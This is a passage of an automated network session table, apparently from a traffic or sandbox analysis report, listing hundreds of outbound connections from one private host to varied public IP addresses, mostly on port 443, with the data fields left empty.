                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13731192.168.2.144456099.196.104.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13732192.168.2.1457330191.179.50.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13733192.168.2.1452382100.57.164.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13734192.168.2.144567671.112.63.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13735192.168.2.145692062.116.90.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13736192.168.2.144308649.96.187.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13737192.168.2.145313623.158.80.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13738192.168.2.143556082.57.237.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13739192.168.2.1440984197.231.211.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13740192.168.2.1434112154.22.139.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13741192.168.2.1451036143.137.31.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13742192.168.2.143510482.61.149.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13743192.168.2.143873895.187.103.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13744192.168.2.146032858.81.203.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13745192.168.2.1447678196.175.154.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13746192.168.2.143450454.21.177.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13747192.168.2.1438866113.94.143.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13748192.168.2.1459690164.199.32.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13749192.168.2.1457352123.116.229.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13750192.168.2.144585694.229.252.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13751192.168.2.1437266208.32.73.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13752192.168.2.1446358182.198.90.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13753192.168.2.1447750171.26.120.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13754192.168.2.143461459.51.21.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13755192.168.2.1452284141.36.45.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13756192.168.2.145999835.211.137.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13757192.168.2.144518831.223.64.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13758192.168.2.1445422153.158.161.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13759192.168.2.143398442.239.85.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13760192.168.2.145030672.54.113.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13761192.168.2.1443574142.238.235.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13762192.168.2.144643087.0.0.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13763192.168.2.146020095.205.104.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13764192.168.2.144115624.233.18.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13765192.168.2.1450104189.21.252.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13766192.168.2.143755658.43.112.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13767192.168.2.143345076.117.182.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13768192.168.2.145902632.46.77.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13769192.168.2.143716850.207.15.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13770192.168.2.1436184169.198.84.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13771192.168.2.144209053.157.254.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13772192.168.2.1438636124.98.251.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13773192.168.2.1437912219.33.66.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13774192.168.2.145083680.181.145.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13775192.168.2.1457280165.49.6.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13776192.168.2.1438688171.244.110.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13777192.168.2.1445370133.104.102.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13778192.168.2.1437782120.85.171.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13779192.168.2.1452572181.13.234.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13780192.168.2.145054043.2.143.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13781192.168.2.1456526158.248.142.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13782192.168.2.144159493.0.237.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13783192.168.2.1447942143.60.84.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13784192.168.2.1454148101.184.21.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13785192.168.2.1450728158.229.105.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13786192.168.2.145023888.188.154.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13787192.168.2.143705665.159.118.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13788192.168.2.1449650106.71.117.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13789192.168.2.145873014.250.148.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13790192.168.2.1444290116.226.218.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13791192.168.2.145629294.173.94.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13792192.168.2.144630217.241.13.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13793192.168.2.1459782188.0.174.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13794192.168.2.1438512117.2.190.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13795192.168.2.1456730157.250.39.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13796192.168.2.145004091.206.176.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13797192.168.2.1449030107.29.64.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13798192.168.2.144893069.100.251.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13799192.168.2.1459900107.115.156.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13800192.168.2.1434404171.54.9.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13801192.168.2.1452644201.157.232.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13802192.168.2.145782285.114.183.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13803192.168.2.1451470201.118.224.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13804192.168.2.145831448.139.28.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13805192.168.2.1443978179.106.7.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13806192.168.2.1453730172.10.240.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13807192.168.2.1438502160.165.86.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13808192.168.2.1438380220.70.171.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13809192.168.2.1442732147.204.30.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13810192.168.2.145159878.99.165.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13811192.168.2.1447550163.193.214.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13812192.168.2.1452488109.149.174.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13813192.168.2.1437550129.229.80.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13814192.168.2.144570458.95.240.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13815192.168.2.1446988185.153.135.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13816192.168.2.1435392157.27.98.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13817192.168.2.145078262.158.91.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13818192.168.2.144191838.242.137.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13819192.168.2.145371246.194.9.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13820192.168.2.1460088200.44.76.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13821192.168.2.1456744171.23.167.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13822192.168.2.1456302193.76.220.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13823192.168.2.143849013.182.152.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13824192.168.2.1439100162.32.156.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13825192.168.2.1460364117.225.187.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13826192.168.2.1456466178.75.186.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13827192.168.2.1453908125.201.71.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13828192.168.2.145496298.81.45.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13829192.168.2.146026441.138.1.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13830192.168.2.143854671.124.204.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13831192.168.2.143299076.194.255.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13832192.168.2.1456848204.207.159.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13833192.168.2.1439284165.116.17.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13834192.168.2.145441231.239.159.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13835192.168.2.145907853.52.1.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13836192.168.2.1435922218.16.59.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13837192.168.2.143682414.76.91.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13838192.168.2.1447966173.188.21.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13839192.168.2.1457642101.237.30.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13840192.168.2.1449496175.243.19.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13841192.168.2.1438860170.73.234.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13842192.168.2.145106486.170.123.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13843192.168.2.144878631.204.229.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13844192.168.2.145785262.157.58.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13845192.168.2.14456581.181.125.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13846192.168.2.14499045.60.181.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13847192.168.2.1443406169.228.234.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13848192.168.2.144417694.128.95.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13849192.168.2.1445898130.230.160.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13850192.168.2.1437828156.231.85.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13851192.168.2.144018297.195.33.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13852192.168.2.143931025.114.63.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13853192.168.2.1437530193.208.246.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13854192.168.2.1441220103.145.109.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13855192.168.2.1452942149.224.222.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13856192.168.2.143581017.154.132.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13857192.168.2.145159683.182.238.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13858192.168.2.144242053.220.87.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13859192.168.2.144385481.163.33.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13860192.168.2.143764844.91.97.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13861192.168.2.1451936204.68.66.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13862192.168.2.145830086.242.31.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13863192.168.2.1453328220.19.16.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13864192.168.2.144382658.11.201.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13865192.168.2.143303878.89.12.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13866192.168.2.1433230111.34.115.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13867192.168.2.145997259.66.114.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13868192.168.2.1458044131.128.117.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13869192.168.2.1440616139.91.151.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13870192.168.2.145256895.232.60.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13871192.168.2.1448398184.95.171.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13872192.168.2.144860496.16.46.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13873192.168.2.144457867.170.111.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13874192.168.2.1449254161.109.237.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13875192.168.2.1436120147.231.108.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13876192.168.2.1434040179.164.81.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13877192.168.2.145963419.76.56.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13878192.168.2.144071886.212.130.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13879192.168.2.144259265.18.194.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13880192.168.2.1456294117.192.220.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13881192.168.2.144856871.31.201.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13882192.168.2.143613618.153.85.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13883192.168.2.1457294134.193.156.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13884192.168.2.1438008183.2.199.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13885192.168.2.1453090194.57.227.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13886192.168.2.1448098221.221.93.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13887192.168.2.145783089.26.154.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13888192.168.2.1435752105.230.10.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13889192.168.2.1445600168.203.200.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13890192.168.2.145197450.254.158.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13891192.168.2.1456934174.246.35.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13892192.168.2.1444854154.229.191.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13893192.168.2.1451998118.4.72.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13894192.168.2.1444980210.70.68.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13895192.168.2.143424245.92.71.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13896192.168.2.1448372142.119.118.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13897192.168.2.1434966101.8.197.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13898192.168.2.1452908167.99.90.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13899192.168.2.1448102202.116.131.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13900192.168.2.144556845.95.71.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13901192.168.2.1451010153.22.158.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13902192.168.2.143743814.246.66.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13903192.168.2.1452288223.103.253.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13904192.168.2.145792032.33.25.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13905192.168.2.1443784203.122.4.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13906192.168.2.1458874182.28.48.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13907192.168.2.143513038.182.24.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13908192.168.2.144050412.90.141.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13909192.168.2.1458304153.164.89.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13910192.168.2.1460604158.231.188.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13911192.168.2.1440012218.6.178.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13912192.168.2.143767897.107.47.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13913192.168.2.145378083.91.162.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13914192.168.2.1447186154.112.129.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13915192.168.2.1437410108.75.228.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13916192.168.2.145780451.123.212.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13917192.168.2.1449134113.181.88.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13918192.168.2.1442994111.86.36.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13919192.168.2.1441576103.236.61.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13920192.168.2.1450070182.40.122.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13921192.168.2.1455368213.200.7.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13922192.168.2.1444988168.175.221.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13923192.168.2.145002080.21.140.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13924192.168.2.1454640186.214.215.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13925192.168.2.145321078.77.60.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13926192.168.2.1443710150.203.255.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13927192.168.2.1433708223.150.105.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13928192.168.2.145341866.21.34.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13929192.168.2.1442330198.176.122.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13930192.168.2.144982097.179.192.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13931192.168.2.1438752110.90.120.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13932192.168.2.1456100155.167.53.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13933192.168.2.1440342101.34.20.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13934192.168.2.1449958180.231.151.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13935192.168.2.1458062119.249.86.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13936192.168.2.1437480128.39.51.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13937192.168.2.143610091.253.133.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13938192.168.2.1460940197.71.204.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13939192.168.2.1450232134.9.1.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13940192.168.2.1441266175.155.223.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13941192.168.2.144337679.59.90.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13942192.168.2.145578446.73.253.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
